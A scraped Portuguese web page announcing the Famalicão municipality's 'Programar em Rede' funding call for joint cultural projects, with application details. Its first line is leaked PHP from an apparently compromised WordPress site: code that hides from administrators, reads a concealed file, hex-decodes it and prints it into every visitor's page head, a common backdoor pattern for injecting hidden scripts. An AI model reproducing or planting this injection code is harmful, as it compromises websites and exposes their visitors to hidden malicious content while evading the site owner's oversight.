if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Programar em Rede - artesentreasletras.com.pt

Programar em Rede

Arrancou em Famalicão o período de candidaturas ao programa municipal, Programar em Rede, que visa apoiar a execução de um projeto cultural que seja promovido em conjunto por duas ou mais associações e instituições do concelho. O apoio municipal pode ir até aos 10 mil euros. As propostas para esta 7.ª edição de iniciativa podem ser submetidas até dia 31 de julho.
Este programa, promovido pelo Município de Vila Nova de Famalicão, destina-se a entidades com atividade no domínio cultural que tenham sede no concelho famalicense ou, não possuindo, promovam atividades de interesse municipal e que sejam pessoas coletivas legalmente constituídas, sem fins lucrativos.
A candidatura pode ser feita através do preenchimento da ficha de inscrição que se encontra disponível no site do Município em www.famalicao.pt/programar-em-rede , devendo esta ser remetida para o endereço eletrónico cultura@famalicao.pt.